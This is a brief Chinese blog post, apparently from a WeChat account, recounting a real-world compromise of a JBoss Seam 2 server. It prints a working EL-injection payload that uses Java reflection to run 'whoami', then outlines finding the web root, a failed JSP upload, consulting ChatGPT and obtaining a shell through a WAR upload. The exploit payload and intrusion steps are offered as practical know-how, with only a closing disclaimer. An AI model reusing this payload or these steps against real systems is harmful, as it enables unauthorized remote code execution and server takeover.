开局awvs高危
搜索下很快就找到一篇文章
https://medium.com/@r0t1v/pwning-jboss-seam-2-like-a-boss-da5a43da6998 看了下好像是el表达式的,感觉实战挺少见的记录一下
payload如下
cid=18&actionOutcome=/pwn.xhtml?pwned%3d%23{"".getClass().forName("java.io.BufferedReader").getDeclaredMethod("readLine").invoke("".getClass().forName("java.io.BufferedReader").getConstructor("".getClass().forName("java.io.Reader")).newInstance("".getClass().forName("java.io.InputStreamReader").getConstructor("".getClass().forName("java.io.InputStream")).newInstance("".getClass().forName("java.lang.Process").getDeclaredMethod("getInputStream").invoke("".getClass().forName("java.lang.Runtime").getDeclaredMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getDeclaredMethod("getRuntime").invoke(null),'whoami')))))}
但是回显只有一行,用文章中的perl base64加密的话有些命令执行没回显,而且反弹不了很烦
用find命令查找到网站路径
上传jsp,结果不解析
把网站路径发给chatgpt
尝试上传war包,成功getshell
原文始发于微信公众号(夺旗赛小萌新):实战jboss getshell(水
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论